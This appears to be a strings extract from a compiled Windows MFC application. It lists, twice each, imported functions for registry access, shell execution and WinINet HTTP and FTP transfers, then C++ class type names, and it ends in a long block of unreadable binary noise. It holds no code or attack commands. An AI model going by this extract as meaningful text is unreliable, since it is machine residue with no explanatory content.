RegEnumKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyW
RegEnumKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
UrlUnescapeW
UrlUnescapeW
SHLWAPI.dll
SHLWAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEACC.dll
OLEACC.dll
InternetCrackUrlW
InternetCrackUrlW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
HttpQueryInfoW
HttpQueryInfoW
InternetCanonicalizeUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpDeleteFileW
FtpRenameFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpPutFileW
FtpGetFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpEndRequestW
HttpEndRequestW
HttpSendRequestExW
HttpSendRequestExW
FtpOpenFileW
FtpOpenFileW
FtpCommandW
FtpCommandW
FtpFindFirstFileW
FtpFindFirstFileW
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
WINMM.dll
WINMM.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCToolCmdUI@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCHotKeyCtrl@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCInternetException@@
.PAVCInternetException@@
X!CCA[ttJBoorLbbH~mm1gNNwWww1g00JyggK gglIttG3MMBnoo4MNNhvllvL00O'WW2add1?XXc~jj4]ooKuSSA)XXNDVVu(ppJcEE6 mmKxgg89nnH?nn4EXX2dUU16vvsiLLZ(vvx$jj38CCfeee3$ppNCjjg_xxfEggZXWWr{jjw^uuwd66N,jjGuXX2{ppz"llb%WWe5llG3WW1awwV%mmv8II6dbbcllaivvwRqqwwwwweddy7oozIXXkNvvwtRRh*QQZ]VVWKnnA2wwPVSSf)ggdPSSG/gg1?XXwC33oFxxx.ggaXQQv2ttN XXA}ddBruueqLLueSSwpNNpibbGxlluVuux?dd8,QQc$ddzlllJvjjB,ggd 66r)ppJoIIADxxw RRophhJ,RRT8ggw7ddd0ccJ5XXPxnnJ/uu1iWWwfIIocll33uu2{ood1xxZZllNTXXpSCCe%IIvpWWwrNNB4SSGoVVBwwwJ.XXz&nnZVxxglWWZHxx2pWWf}XXw&WWr/VV1gllBBwwEymme&VVl mmZRnnqMkkruFF3`ccNUggIOppsdLLoKmmHGggHwWWvURsnnNyNNu>XXf$xxTIppfEbb5=ooG4XXP8XXcjqqq2WWvGRRvoWWfnVVMqllf-RRLRuuc%jjw9ll4Yddz_XXfsooNwooB.nnshbbJ(bb6#uuH/ggw(kkz?jj1Tbbv'oo2XCCvxxHhXXHm33eDxx25112/xxJB66yGggc:ttRpggcVnnkxnn4RxxlGSSG,qqIYhhJzjj5cppw@33gFnn3!NNm*bbc!jjqvXXr?ggsPppfYNNWXmmfPIIR"hhJw66pHQQeMttJ@jjeAXXOFmmeWII6.oow/LLGpuuwuUUZ[vvdMHH1YppNSlllfuuAQLLH?SS4:ee4}jjG ee3Fkke#IIP@xxzJggjhttc%qq4AXXp&ggOKwwd$llG8pp4$bb6Tmme